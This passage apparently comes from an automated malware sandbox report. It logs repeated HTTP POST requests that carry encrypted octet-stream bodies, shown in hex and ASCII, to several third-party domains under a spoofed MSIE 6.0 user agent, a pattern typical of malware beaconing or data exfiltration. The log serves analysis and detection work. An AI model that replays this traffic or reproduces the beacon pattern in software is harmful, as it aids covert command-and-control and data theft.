75 76 4d 72 4a 69 34 4a 70 43 6f 75 58 73 37 58 38 5a 33 73 51 68 50 51 53 31 54 30 4e 56 68 59 4b 62 31 77 59 71 4c 62 54 5a 6b 31 39 73 48 48 39 69 2b 4c 76 5a 36 56 76 74 63 4e 62 72 4a 4c 4c 34 31 66 59 6e 6e 66 62 51 69 75 4a 4e 34 31 46 64 39 43 62 76 51 68 33 74 70 74 6a 30 64 49 42 71 2b 77 3d 3d Data Ascii: l/NC0ol9x5fYUnbo2On1r6JGF/CnCeFmzaj/y5BSLzYRVCG4SHivXX6wPJxcDsTzsFQMg4xX3CaZz92KKh/hsDnrWMm6Y3eT6MIm1JLnJ6KJKnzUT1dajF1Ju9R78TCK+Y7mFZr+XjshvbZEbmFAcjDjDnf2r/z4U5H4N/wn2Gh26XmpotFpL6cX+zvbL2YHsqDXffwMcOc+djwiQYWABQDoxrADrbeVSdUpUOhpIBMuCu0QJtgdRNbW56whmgNMG9i/WVa0qu0rVJVgvgrLFK9LpTthtebHBmfKKeNexG39saBgdtZezuGCBvco2b6hq+pMLEJZp0ktLrfQmFLpjm6leHLiuxo/3ViFTb3YPIIVcO6gjq3Jzk4brawew//IWPygy2Jowsyx9+WLessTCUrqg0/emmWMyPX/LqVKNDRkmtXXYu5auMtfMq9O5qgNHKuvMrJi4JpCouXs7X8Z3sQhPQS1T0NVhYKb1wYqLbTZk19sHH9i+LvZ6VvtcNbrJLL41fYnnfbQiuJN41Fd9CbvQh3tptj0dIBq+w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 68 49 30 68 78 72 45 59 78 35 66 4a 47 41 4a 70 30 4c 71 71 72 67 6f 51 56 31 54 76 56 78 37 35 64 61 4b 76 4c 6d 72 2b 65 48 71 6b 42 6c 35 41 50 35 44 4d 57 37 69 74 77 61 6f 56 35 36 58 59 2b 37 2b 52 54 46 31 68 75 5a 74 71 75 79 37 42 70 72 65 42 73 37 69 75 36 42 71 4b 53 4c 58 70 59 4b 65 4d 54 73 41 61 77 4a 72 64 2b 4a 57 59 32 6d 79 73 72 39 57 73 64 6d 56 37 39 36 4f 37 51 58 6d 34 54 52 48 50 5a 39 45 46 6d 4b 6c 6d 71 76 48 68 47 61 34 42 32 52 46 54 6d 61 4e 78 7a 6d 52 54 42 42 4a 34 52 47 2b 57 4b 75 6b 6e 4c 72 52 6d 72 50 73 4b 44 45 78 46 31 64 6c 36 71 46 37 6f 41 47 6b 42 78 47 54 6e 45 45 39 72 45 4e 35 64 4a 6a 56 4e 54 58 66 45 7a 70 4b 44 30 52 43 37 54 4a 59 77 52 61 76 48 32 42 37 66 31 78 37 52 64 78 7a 31 73 74 4d 4d 51 31 46 6e 6c 4f 4e 47 78 33 4a 4d 4f 74 73 69 2f 68 39 66 30 66 78 42 76 6f 75 6a 6b 4c 66 68 66 44 52 48 32 61 45 67 32 69 4d 38 53 53 41 37 46 44 78 39 47 6b 73 50 71 6d 44 44 57 54 56 43 32 57 42 68 67 74 53 41 36 32 77 32 2b 65 34 56 48 55 74 78 4a 46 56 56 38 54 63 39 48 35 79 46 68 72 56 67 31 38 32 57 35 61 71 63 35 72 43 2f 4c 54 76 34 6c 62 72 78 78 38 61 72 48 48 34 67 39 38 46 6b 41 48 4e 36 74 30 51 55 47 4a 41 38 48 55 46 4f 31 79 42 62 32 44 70 34 31 45 61 73 4f 6d 67 43 75 41 54 57 53 62 32 32 51 47 51 78 6b 37 44 77 35 79 35 4a 36 6a 6a 4a 35 35 70 44 33 48 31 71 73 53 58 64 77 6c 75 32 6f 39 48 51 31 6d 2f 65 65 6e 77 4c 6f 63 53 76 76 42 70 57 45 66 6d 6e 75 53 32 47 70 79 6e 6f 4b 75 70 79 51 37 58 4d 50 71 4d 34 78 64 45 52 36 4f 66 6e 48 46 61 7a 55 73 6b 68 62 7a 62 71 68 56 72 4a 4a 61 6e 49 6d 75 49 42 49 6c 67 47 6b 35 4a 4b 70 66 69 6f 42 65 5a 39 33 47 34 79 58 4b 70 73 56 36 55 69 37 57 33 58 6c 4a 63 37 65 41 6d 4e 4f 4d 53 7a 45 2b 4a 6c 33 58 6a 77 45 7a 42 37 74 77 3d 3d Data Ascii: hI0hxrEYx5fJGAJp0LqqrgoQV1TvVx75daKvLmr+eHqkBl5AP5DMW7itwaoV56XY+7+RTF1huZtquy7BpreBs7iu6BqKSLXpYKeMTsAawJrd+JWY2mysr9WsdmV796O7QXm4TRHPZ9EFmKlmqvHhGa4B2RFTmaNxzmRTBBJ4RG+WKuknLrRmrPsKDExF1dl6qF7oAGkBxGTnEE9rEN5dJjVNTXfEzpKD0RC7TJYwRavH2B7f1x7Rdxz1stMMQ1FnlONGx3JMOtsi/h9f0fxBvoujkLfhfDRH2aEg2iM8SSA7FDx9GksPqmDDWTVC2WBhgtSA62w2+e4VHUtxJFVV8Tc9H5yFhrVg182W5aqc5rC/LTv4lbrxx8arHH4g98FkAHN6t0QUGJA8HUFO1yBb2Dp41EasOmgCuATWSb22QGQxk7Dw5y5J6jjJ55pD3H1qsSXdwlu2o9HQ1m/eenwLocSvvBpWEfmnuS2GpynoKupyQ7XMPqM4xdER6OfnHFazUskhbzbqhVrJJanImuIBIlgGk5JKpfioBeZ93G4yXKpsV6Ui7W3XlJc7eAmNOMSzE+Jl3XjwEzB7tw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 55 75 63 4a 77 56 72 75 78 70 65 6b 31 38 76 4a 66 65 6c 4b 65 35 33 59 2b 7a 42 4b 58 59 39 72 4c 69 35 44 39 6d 2f 4e 70 6b 53 72 53 50 6c 4a 35 43 71 69 63 48 68 38 75 74 57 37 45 4d 56 6d 31 50 65 64 77 43 4f 51 45 59 7a 66 7a 43 72 37 50 69 36 78 41 57 70 6d 61 6e 74 7a 4a 66 77 5a 5a 73 30 75 79 68 32 63 4c 35 31 5a 4c 73 51 49 33 34 30 45 37 68 39 42 4e 44 70 48 32 4d 7a 74 43 50 76 73 52 30 71 62 53 53 53 4c 46 4b 46 43 39 69 65 6b 36 74 72 47 61 44 7a 4f 6b 6c 33 62 55 7a 49 43 6f 33 78 78 59 47 57 75 62 56 4c 4f 32 4a 79 33 44 6c 45 72 35 53 6a 62 63 6e 51 37 54 52 2b 61 39 36 56 78 43 59 41 78 37 72 4c 39 77 69 50 53 6f 70 65 33 58 74 43 5a 72 4c 66 69 4b 4b 66 4a 59 69 37 74 4e 6c 2b 72 4a 70 76 61 7a 76 73 4b 63 76 47 31 56 42 74 58 61 4e 64 47 2b 59 6d 52 63 76 4e 41 48 32 6c 61 41 59 45 70 6d 4e 6e 30 45 6a 49 70 56 79 2b 70 6c 37 70 57 59 63 42 6d 2f 62 54 37 69 56 52 53 72 58 76 55 33 78 44 4a 48 51 72 2f 66 6d 34 73 7a 36 4b 6e 2f 62 4f 4d 78 48 2f 54 33 4d 43 34 33 6a 55 50 6a 79 34 57 46 37 53 52 6b 51 6f 6c 61 78 45 72 56 70 4b 6e 71 75 74 35 6e 31 55 31 53 45 78 59 30 51 35 4f 4d 7a 4e 37 66 7a 33 5a 2b 6c 4d 4d 59 73 6d 4e 77 47 49 43 7a 48 41 54 78 77 42 71 4c 38 72 74 54 32 52 46 30 65 54 68 70 73 6d 47 71 46 38 64 6f 4c 51 66 4e 59 63 31 36 70 30 59 6a 66 6d 4e 41 43 2f 52 4d 64 34 51 64 73 72 53 49 4e 51 70 33 63 36 59 4e 65 43 7a 62 63 56 42 56 4d 73 69 43 7a 62 4b 6e 51 30 48 31 46 72 41 66 4a 58 79 57 53 31 74 6a 32 4a 4f 52 51 61 4e 36 6f 30 5a 30 72 74 5a 6d 6d 37 66 72 52 4c 6c 37 6f 61 72 43 2f 37 55 52 76 6e 79 74 38 6a 33 76 55 42 46 41 4d 41 72 67 4a 61 33 2b 2f 48 58 4c 58 2f 48 4b 56 38 44 75 33 64 78 49 4e 65 70 51 4c 5a 47 77 37 78 34 4e 56 2b 55 79 31 73 3d Data Ascii: UucJwVruxpek18vJfelKe53Y+zBKXY9rLi5D9m/NpkSrSPlJ5CqicHh8utW7EMVm1PedwCOQEYzfzCr7Pi6xAWpmantzJfwZZs0uyh2cL51ZLsQI340E7h9BNDpH2MztCPvsR0qbSSSLFKFC9iek6trGaDzOkl3bUzICo3xxYGWubVLO2Jy3DlEr5SjbcnQ7TR+a96VxCYAx7rL9wiPSope3XtCZrLfiKKfJYi7tNl+rJpvazvsKcvG1VBtXaNdG+YmRcvNAH2laAYEpmNn0EjIpVy+pl7pWYcBm/bT7iVRSrXvU3xDJHQr/fm4sz6Kn/bOMxH/T3MC43jUPjy4WF7SRkQolaxErVpKnqut5n1U1SExY0Q5OMzN7fz3Z+lMMYsmNwGICzHATxwBqL8rtT2RF0eThpsmGqF8doLQfNYc16p0YjfmNAC/RMd4QdsrSINQp3c6YNeCzbcVBVMsiCzbKnQ0H1FrAfJXyWS1tj2JORQaN6o0Z0rtZmm7frRLl7oarC/7URvnyt8j3vUBFAMArgJa3+/HXLX/HKV8Du3dxINepQLZGw7x4NV+Uy1s=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 70 4c 74 69 49 55 46 51 36 35 64 35 39 2b 6c 2f 49 4f 79 30 69 78 71 43 74 34 65 2f 58 6d 37 41 42 63 74 6c 52 50 44 31 58 49 48 79 50 4b 4d 51 37 78 63 4c 58 63 4a 74 4e 62 67 62 6e 63 58 72 4a 69 35 59 5a 31 30 72 72 71 67 6b 79 45 2f 42 50 49 78 6d 46 42 2f 50 62 4b 54 71 64 48 5a 68 53 6f 44 58 64 36 62 5a 6a 46 41 72 63 2f 4a 4a 47 54 43 73 52 42 67 42 4d 33 6e 52 6f 75 76 43 72 46 46 73 4d 6f 32 6e 4a 31 66 6a 78 33 34 47 6a 6a 58 46 36 6f 30 56 57 68 6c 64 53 6b 68 4a 49 59 78 67 36 2f 62 78 57 68 38 62 68 69 59 45 68 43 65 72 38 2f 52 4a 6a 31 58 36 33 36 4b 4d 64 68 42 7a 50 6d 2b 74 67 78 72 31 54 58 72 6c 74 75 66 62 41 47 33 72 46 4f 6f 65 4e 39 6e 7a 46 4b 68 64 79 43 6f 36 71 56 4f 46 43 38 64 58 72 64 54 75 4f 4e 6c 7a 34 64 49 43 33 39 37 52 38 67 76 55 33 35 70 71 65 53 6d 78 68 50 6d 55 45 58 6f 37 74 43 38 73 41 4b 76 4b 31 56 51 39 70 74 55 56 48 37 7a 52 7a 51 70 33 6c 61 4d 61 6d 68 38 72 65 4a 2f 6b 38 77 48 79 5a 58 79 35 77 42 49 6e 36 2b 6d 30 33 58 55 45 6c 31 52 39 45 39 67 2b 76 45 69 43 6f 78 4d 34 5a 75 56 52 5a 72 39 53 57 47 47 78 39 44 79 66 55 31 65 79 36 37 68 30 47 33 2b 55 42 6f 47 31 74 78 49 4f 76 72 71 64 56 63 6e 71 42 58 4f 51 75 65 65 4b 73 47 33 4c 36 58 65 75 4f 71 63 32 76 6c 44 4f 70 61 56 57 63 6b 7a 56 47 4c 46 2b 74 39 53 62 30 7a 35 43 6d 78 6f 51 43 47 51 78 52 33 77 57 47 57 32 33 4b 6d 4e 35 74 4d 57 33 64 39 72 72 36 32 63 76 30 55 74 4a 66 30 6a 74 47 6b 54 44 4f 33 5a 78 2f 49 2f 6e 4e 41 5a 73 6c 4a 43 6f 35 54 49 63 76 6e 72 42 33 2b 6b 44 6b 35 4b 39 76 63 59 36 64 31 67 64 52 35 38 58 39 2f 51 79 53 47 59 49 57 72 51 2f 51 6a 79 34 43 38 43 32 69 43 69 33 68 54 55 6b 6e 41 37 6e 78 4f 6e 55 Data Ascii: pLtiIUFQ65d59+l/IOy0ixqCt4e/Xm7ABctlRPD1XIHyPKMQ7xcLXcJtNbgbncXrJi5YZ10rrqgkyE/BPIxmFB/PbKTqdHZhSoDXd6bZjFArc/JJGTCsRBgBM3nRouvCrFFsMo2nJ1fjx34GjjXF6o0VWhldSkhJIYxg6/bxWh8bhiYEhCer8/RJj1X636KMdhBzPm+tgxr1TXrltufbAG3rFOoeN9nzFKhdyCo6qVOFC8dXrdTuONlz4dIC397R8gvU35pqeSmxhPmUEXo7tC8sAKvK1VQ9ptUVH7zRzQp3laMamh8reJ/k8wHyZXy5wBIn6+m03XUEl1R9E9g+vEiCoxM4ZuVRZr9SWGGx9DyfU1ey67h0G3+UBoG1txIOvrqdVcnqBXOQueeKsG3L6XeuOqc2vlDOpaVWckzVGLF+t9Sb0z5CmxoQCGQxR3wWGW23KmN5tMW3d9rr62cv0UtJf0jtGkTDO3Zx/I/nNAZslJCo5TIcvnrB3+kDk5K9vcY6d1gdR58X9/QySGYIWrQ/Qjy4C8C2iCi3hTUknA7nxOnU
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 56 2b 2f 39 79 63 6b 34 78 35 63 77 41 44 6e 74 47 4f 76 4e 33 65 4c 6a 4e 49 33 6e 74 55 6d 4a 44 58 67 4f 54 31 56 32 41 38 51 59 53 47 56 59 4b 32 55 54 67 66 66 79 31 67 4f 45 62 78 4e 49 6e 6b 53 78 66 34 56 65 76 5a 58 4e 4e 79 68 59 65 36 7a 51 64 4d 42 7a 2f 36 38 39 2f 43 73 6c 5a 54 4a 68 4f 65 57 50 6e 41 39 50 4f 2f 68 63 59 44 2b 73 4c 77 68 64 2b 55 70 6f 52 6b 4a 38 7a 6e 7a 7a 55 33 7a 58 77 31 52 32 52 7a 55 63 77 77 6d 2b 71 68 69 4b 54 6a 75 69 59 6c 39 52 6f 64 6d 32 56 39 33 32 5a 35 5a 50 4c 6e 73 79 38 53 50 52 48 69 47 54 33 78 41 48 31 79 67 71 7a 64 61 54 38 64 73 30 47 41 67 44 38 77 6a 64 2f 57 51 50 65 32 78 75 75 74 41 73 32 61 49 32 50 52 52 77 68 34 74 38 4b 57 58 38 4f 66 6b 74 6f 64 6b 37 5a 51 68 6d 48 71 32 4c 51 78 2b 68 41 37 77 44 50 49 73 6d 35 73 73 2b 2b 67 6e 32 78 6c 43 6d 64 39 77 79 34 46 67 6d 75 45 38 6b 75 57 57 5a 69 4b 6d 58 33 4b 6a 4b 4c 65 5a 39 53 5a 37 52 72 5a 4b 58 47 31 4d 7a 56 68 70 51 51 44 35 75 55 76 49 38 77 5a 7a 66 63 73 31 6f 77 4f 37 6a 6e 64 50 69 54 75 36 42 6c 30 2f 68 36 74 52 51 2f 5a 63 2f 54 71 4b 78 68 6b 4c 4d 4e 35 75 30 75 59 65 70 4a 45 78 38 64 5a 48 45 49 2b 37 50 73 7a 76 55 70 32 65 57 75 4c 57 51 46 71 37 78 57 79 32 57 67 35 55 33 2b 41 71 31 68 69 4a 53 71 45 72 73 2f 49 76 2b 59 7a 50 46 68 70 49 39 77 54 68 2b 35 6f 45 39 2f 2b 6e 68 47 6e 30 56 69 73 4e 35 4a 70 4d 64 51 72 31 38 48 79 4d 47 57 45 4d 65 62 59 35 44 6e 53 62 5a 6a 48 39 2b 66 50 6a 64 44 69 70 7a 67 56 42 35 30 72 5a 72 6e 45 72 4c 6f 38 77 7a 48 68 6c 4c 6c 7a 65 45 36 51 79 54 49 65 67 4a 51 2b 2f 4c 37 41 79 49 4e 67 54 64 6d 6e 32 4c 48 4c 69 79 68 57 33 6d 69 75 6d 31 47 58 35 73 58 59 32 71 55 66 4f 64 45 79 53 30 4d 47 44 37 58 48 5a 47 72 42 63 75 73 58 59 3d Data Ascii: V+/9yck4x5cwADntGOvN3eLjNI3ntUmJDXgOT1V2A8QYSGVYK2UTgffy1gOEbxNInkSxf4VevZXNNyhYe6zQdMBz/689/CslZTJhOeWPnA9PO/hcYD+sLwhd+UpoRkJ8znzzU3zXw1R2RzUcwwm+qhiKTjuiYl9Rodm2V932Z5ZPLnsy8SPRHiGT3xAH1ygqzdaT8ds0GAgD8wjd/WQPe2xuutAs2aI2PRRwh4t8KWX8Ofktodk7ZQhmHq2LQx+hA7wDPIsm5ss++gn2xlCmd9wy4FgmuE8kuWWZiKmX3KjKLeZ9SZ7RrZKXG1MzVhpQQD5uUvI8wZzfcs1owO7jndPiTu6Bl0/h6tRQ/Zc/TqKxhkLMN5u0uYepJEx8dZHEI+7PszvUp2eWuLWQFq7xWy2Wg5U3+Aq1hiJSqErs/Iv+YzPFhpI9wTh+5oE9/+nhGn0VisN5JpMdQr18HyMGWEMebY5DnSbZjH9+fPjdDipzgVB50rZrnErLo8wzHhlLlzeE6QyTIegJQ+/L7AyINgTdmn2LHLiyhW3mium1GX5sXY2qUfOdEyS0MGD7XHZGrBcusXY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 6c 2f 4e 43 30 6f 6c 39 78 35 66 59 55 6e 62 6f 32 4f 6e 31 72 36 4a 47 46 2f 43 6e 43 65 46 6d 7a 61 6a 2f 79 35 42 53 4c 7a 59 52 56 43 47 34 53 48 69 76 58 58 36 77 50 4a 78 63 44 73 54 7a 73 46 51 4d 67 34 78 58 33 43 61 5a 7a 39 32 4b 4b 68 2f 68 73 44 6e 72 57 4d 6d 36 59 33 65 54 36 4d 49 6d 31 4a 4c 6e 4a 36 4b 4a 4b 6e 7a 55 54 31 64 61 6a 46 31 4a 75 39 52 37 38 54 43 4b 2b 59 37 6d 46 5a 72 2b 58 6a 73 68 76 62 5a 45 62 6d 46 41 63 6a 44 6a 44 6e 66 32 72 2f 7a 34 55 35 48 34 4e 2f 77 6e 32 47 68 32 36 58 6d 70 6f 74 46 70 4c 36 63 58 2b 7a 76 62 4c 32 59 48 73 71 44 58 66 66 77 4d 63 4f 63 2b 64 6a 77 69 51 59 57 41 42 51 44 6f 78 72 41 44 72 62 65 56 53 64 55 70 55 4f 68 70 49 42 4d 75 43 75 30 51 4a 74 67 64 52 4e 62 57 35 36 77 68 6d 67 4e 4d 47 39 69 2f 57 56 61 30 71 75 30 72 56 4a 56 67 76 67 72 4c 46 4b 39 4c 70 54 74 68 74 65 62 48 42 6d 66 4b 4b 65 4e 65 78 47 33 39 73 61 42 67 64 74 5a 65 7a 75 47 43 42 76 63 6f 32 62 36 68 71 2b 70 4d 4c 45 4a 5a 70 30 6b 74 4c 72 66 51 6d 46 4c 70 6a 6d 36 6c 65 48 4c 69 75 78 6f 2f 33 56 69 46 54 62 33 59 50 49 49 56 63 4f 36 67 6a 71 33 4a 7a 6b 34 62 72 61 77 65 77 2f 2f 49 57 50 79 67 79 32 4a 6f 77 73 79 78 39 2b 57 4c 65 73 73 54 43 55 72 71 67 30 2f 65 6d 6d 57 4d 79 50 58 2f 4c 71 56 4b 4e 44 52 6b 6d 74 58 58 59 75 35 61 75 4d 74 66 4d 71 39 4f 35 71 67 4e 48 4b 75 76 4d 72 4a 69 34 4a 70 43 6f 75 58 73 37 58 38 5a 33 73 51 68 50 51 53 31 54 30 4e 56 68 59 4b 62 31 77 59 71 4c 62 54 5a 6b 31 39 73 48 48 39 69 2b 4c 76 5a 36 56 76 74 63 4e 62 72 4a 4c 4c 34 31 66 59 6e 6e 66 62 51 69 75 4a 4e 34 31 46 64 39 43 62 76 51 68 33 74 70 74 6a 30 64 49 42 71 2b 77 3d 3d Data Ascii: l/NC0ol9x5fYUnbo2On1r6JGF/CnCeFmzaj/y5BSLzYRVCG4SHivXX6wPJxcDsTzsFQMg4xX3CaZz92KKh/hsDnrWMm6Y3eT6MIm1JLnJ6KJKnzUT1dajF1Ju9R78TCK+Y7mFZr+XjshvbZEbmFAcjDjDnf2r/z4U5H4N/wn2Gh26XmpotFpL6cX+zvbL2YHsqDXffwMcOc+djwiQYWABQDoxrADrbeVSdUpUOhpIBMuCu0QJtgdRNbW56whmgNMG9i/WVa0qu0rVJVgvgrLFK9LpTthtebHBmfKKeNexG39saBgdtZezuGCBvco2b6hq+pMLEJZp0ktLrfQmFLpjm6leHLiuxo/3ViFTb3YPIIVcO6gjq3Jzk4brawew//IWPygy2Jowsyx9+WLessTCUrqg0/emmWMyPX/LqVKNDRkmtXXYu5auMtfMq9O5qgNHKuvMrJi4JpCouXs7X8Z3sQhPQS1T0NVhYKb1wYqLbTZk19sHH9i+LvZ6VvtcNbrJLL41fYnnfbQiuJN41Fd9CbvQh3tptj0dIBq+w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cel-cpa.comCache-Control: no-cacheData Raw: 37 6a 72 56 4e 2b 72 4a 79 70 66 5a 45 42 39 77 7a 58 41 49 64 71 32 4f 37 34 30 61 79 48 47 67 76 6e 4b 68 53 71 69 37 39 74 72 54 6f 74 33 7a 74 49 58 62 47 71 62 74 4e 6d 41 55 71 42 72 4f 70 77 4c 4f 2b 64 38 45 4f 67 59 68 7a 35 41 46 51 38 6e 70 41 6a 58 43 33 7a 42 38 4a 48 49 4a 37 71 38 45 55 67 52 6b 6e 72 31 49 33 47 59 79 58 4f 4a 55 67 47 4b 37 4b 53 67 72 34 74 39 52 74 4b 39 66 62 6e 39 77 75 49 65 43 52 2f 63 44 56 7a 52 55 73 30 55 37 34 31 5a 4d 65 70 61 63 68 36 51 62 68 71 75 68 72 79 51 6a 43 5a 44 73 79 36 68 37 35 57 79 43 70 37 61 44 45 52 65 6e 4f 6e 48 46 33 70 52 68 31 71 58 41 72 35 74 68 63 4c 75 43 49 6c 43 48 33 68 32 4d 77 4b 6a 4b 47 62 6e 44 71 59 4f 32 48 4e 51 4a 61 38 75 41 68 56 77 4a 62 59 78 47 4c 67 66 44 4a 6f 41 41 75 4c 51 35 39 38 35 69 33 65 64 2b 77 42 74 78 6e 70 64 68 4b 33 43 63 6e 32 50 41 6e 6e 4e 6e 63 52 31 74 57 79 47 70 39 34 4b 63 6d 45 47 35 73 6b 38 2b 54 44 68 56 62 52 57 5a 61 61 39 46 6e 31 50 6b 57 30 41 55 6c 38 33 76 34 48 78 64 49 2b 54 68 6c 39 71 34 36 59 65 53 2b 31 42 4e 63 65 5a 61 53 39 69 58 35 33 4f 75 53 43 57 56 67 64 4b 6a 54 77 2f 67 5a 48 49 57 38 50 52 2f 62 4d 65 66 6c 65 65 5a 42 2f 4a 35 34 69 74 32 75 34 33 53 73 64 6f 41 70 6f 75 30 34 4a 58 71 57 62 2f 77 2f 51 53 6a 37 6d 56 4e 4c 32 67 4e 34 50 76 34 79 75 53 31 41 46 78 41 44 61 44 33 67 6f 48 36 36 31 57 2b 46 51 54 73 49 42 45 76 4c 75 4b 70 6b 2f 37 4e 57 78 6f 62 49 57 6e 56 67 41 70 73 75 74 33 56 79 32 6a 6f 49 34 32 33 31 30 75 6e 53 76 6e 63 5a 59 57 5a 6c 61 54 6b 69 73 6d 41 76 37 56 48 32 66 54 41 50 78 7a 43 6a 39 48 31 72 78 35 59 71 43 35 66 4c 55 41 64 Data Ascii: 7jrVN+rJypfZEB9wzXAIdq2O740ayHGgvnKhSqi79trTot3ztIXbGqbtNmAUqBrOpwLO+d8EOgYhz5AFQ8npAjXC3zB8JHIJ7q8EUgRknr1I3GYyXOJUgGK7KSgr4t9RtK9fbn9wuIeCR/cDVzRUs0U741ZMepach6QbhquhryQjCZDsy6h75WyCp7aDERenOnHF3pRh1qXAr5thcLuCIlCH3h2MwKjKGbnDqYO2HNQJa8uAhVwJbYxGLgfDJoAAuLQ5985i3ed+wBtxnpdhK3Ccn2PAnnNncR1tWyGp94KcmEG5sk8+TDhVbRWZaa9Fn1PkW0AUl83v4HxdI+Thl9q46YeS+1BNceZaS9iX53OuSCWVgdKjTw/gZHIW8PR/bMefleeZB/J54it2u43SsdoApou04JXqWb/w/QSj7mVNL2gN4Pv4yuS1AFxADaD3goH661W+FQTsIBEvLuKpk/7NWxobIWnVgApsut3Vy2joI42310unSvncZYWZlaTkismAv7VH2fTAPxzCj9H1rx5YqC5fLUAd
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 6c 2f 4e 43 30 6f 6c 39 78 35 66 59 55 6e 62 6f 32 4f 6e 31 72 36 4a 47 46 2f 43 6e 43 65 46 6d 7a 61 6a 2f 79 35 42 53 4c 7a 59 52 56 43 47 34 53 48 69 76 58 58 36 77 50 4a 78 63 44 73 54 7a 73 46 51 4d 67 34 78 58 33 43 61 5a 7a 39 32 4b 4b 68 2f 68 73 44 6e 72 57 4d 6d 36 59 33 65 54 36 4d 49 6d 31 4a 4c 6e 4a 36 4b 4a 4b 6e 7a 55 54 31 64 61 6a 46 31 4a 75 39 52 37 38 54 43 4b 2b 59 37 6d 46 5a 72 2b 58 6a 73 68 76 62 5a 45 62 6d 46 41 63 6a 44 6a 44 6e 66 32 72 2f 7a 34 55 35 48 34 4e 2f 77 6e 32 47 68 32 36 58 6d 70 6f 74 46 70 4c 36 63 58 2b 7a 76 62 4c 32 59 48 73 71 44 58 66 66 77 4d 63 4f 63 2b 64 6a 77 69 51 59 57 41 42 51 44 6f 78 72 41 44 72 62 65 56 53 64 55 70 55 4f 68 70 49 42 4d 75 43 75 30 51 4a 74 67 64 52 4e 62 57 35 36 77 68 6d 67 4e 4d 47 39 69 2f 57 56 61 30 71 75 30 72 56 4a 56 67 76 67 72 4c 46 4b 39 4c 70 54 74 68 74 65 62 48 42 6d 66 4b 4b 65 4e 65 78 47 33 39 73 61 42 67 64 74 5a 65 7a 75 47 43 42 76 63 6f 32 62 36 68 71 2b 70 4d 4c 45 4a 5a 70 30 6b 74 4c 72 66 51 6d 46 4c 70 6a 6d 36 6c 65 48 4c 69 75 78 6f 2f 33 56 69 46 54 62 33 59 50 49 49 56 63 4f 36 67 6a 71 33 4a 7a 6b 34 62 72 61 77 65 77 2f 2f 49 57 50 79 67 79 32 4a 6f 77 73 79 78 39 2b 57 4c 65 73 73 54 43 55 72 71 67 30 2f 65 6d 6d 57 4d 79 50 58 2f 4c 71 56 4b 4e 44 52 6b 6d 74 58 58 59 75 35 61 75 4d 74 66 4d 71 39 4f 35 71 67 4e 48 4b 75 76 4d 72 4a 69 34 4a 70 43 6f 75 58 73 37 58 38 5a 33 73 51 68 50 51 53 31 54 30 4e 56 68 59 4b 62 31 77 59 71 4c 62 54 5a 6b 31 39 73 48 48 39 69 2b 4c 76 5a 36 56 76 74 63 4e 62 72 4a 4c 4c 34 31 66 59 6e 6e 66 62 51 69 75 4a 4e 34 31 46 64 39 43 62 76 51 68 33 74 70 74 6a 30 64 49 42 71 2b 77 3d 3d Data Ascii: l/NC0ol9x5fYUnbo2On1r6JGF/CnCeFmzaj/y5BSLzYRVCG4SHivXX6wPJxcDsTzsFQMg4xX3CaZz92KKh/hsDnrWMm6Y3eT6MIm1JLnJ6KJKnzUT1dajF1Ju9R78TCK+Y7mFZr+XjshvbZEbmFAcjDjDnf2r/z4U5H4N/wn2Gh26XmpotFpL6cX+zvbL2YHsqDXffwMcOc+djwiQYWABQDoxrADrbeVSdUpUOhpIBMuCu0QJtgdRNbW56whmgNMG9i/WVa0qu0rVJVgvgrLFK9LpTthtebHBmfKKeNexG39saBgdtZezuGCBvco2b6hq+pMLEJZp0ktLrfQmFLpjm6leHLiuxo/3ViFTb3YPIIVcO6gjq3Jzk4brawew//IWPygy2Jowsyx9+WLessTCUrqg0/emmWMyPX/LqVKNDRkmtXXYu5auMtfMq9O5qgNHKuvMrJi4JpCouXs7X8Z3sQhPQS1T0NVhYKb1wYqLbTZk19sHH9i+LvZ6VvtcNbrJLL41fYnnfbQiuJN41Fd9CbvQh3tptj0dIBq+w==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 68 49 30 68 78 72 45 59 78 35 66 4a 47 41 4a 70 30 4c 71 71 72 67 6f 51 56 31 54 76 56 78 37 35 64 61 4b 76 4c 6d 72 2b 65 48 71 6b 42 6c 35 41 50 35 44 4d 57 37 69 74 77 61 6f 56 35 36 58 59 2b 37 2b 52 54 46 31 68 75 5a 74 71 75 79 37 42 70 72 65 42 73 37 69 75 36 42 71 4b 53 4c 58 70 59 4b 65 4d 54 73 41 61 77 4a 72 64 2b 4a 57 59 32 6d 79 73 72 39 57 73 64 6d 56 37 39 36 4f 37 51 58 6d 34 54 52 48 50 5a 39 45 46 6d 4b 6c 6d 71 76 48 68 47 61 34 42 32 52 46 54 6d 61 4e 78 7a 6d 52 54 42 42 4a 34 52 47 2b 